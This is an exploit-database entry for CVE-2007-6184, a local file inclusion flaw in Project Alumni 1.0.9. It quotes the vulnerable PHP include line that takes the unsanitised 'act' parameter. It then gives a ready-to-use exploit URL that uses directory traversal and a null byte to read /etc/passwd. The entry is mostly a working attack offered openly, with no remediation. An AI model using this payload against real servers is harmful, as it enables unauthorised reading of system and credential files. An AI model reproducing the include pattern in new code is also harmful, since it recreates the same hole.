project alumni 1.0.9 - 'index.php?act' Local File Inclusion
Author: tomplixsee type: webapps platform: php port: date_added: 2007-11-26 date_updated: 2016-10-20 verified: 1 codes: OSVDB-39673;CVE-2007-6184 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comproject-alumni-v1.0.9.zip raw file: 4669.txt
project alumni 1.0.9 remote file disclosure vulnerability download : https://sourceforge.net/projects/project-alumni/ vulnerable code on index.php include($_SERVER['DOCUMENT_ROOT'] . "/pages/" . $_GET['act'] . ".page.inc.php"); exploit : http://victim/path/index.php?act=../../../../../../etc/passwd%00 discovered by tomplixsee # milw0rm.com [2007-11-27]